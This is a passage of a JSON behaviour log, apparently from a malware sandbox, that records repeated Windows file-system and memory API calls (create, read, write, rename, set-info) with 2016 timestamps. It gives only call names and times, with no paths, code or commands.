"api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:52,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,808", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,818", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,818", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,828", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,828", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,838", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,848", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,848", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,858", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,858", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,868", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,868", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,878", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:52,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,898", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:52,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,908", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,908", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,918", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,918", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,918", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,928", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,928", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:52,928", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,938", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,948", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,948", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,948", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,958", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,958", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,968", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:52,968", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,968", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,968", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,978", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:52,978", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,978", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,978", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,988", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,988", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,008", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,008", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,008", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,018", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,028", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,028", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,028", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,038", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,038", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,038", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,048", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 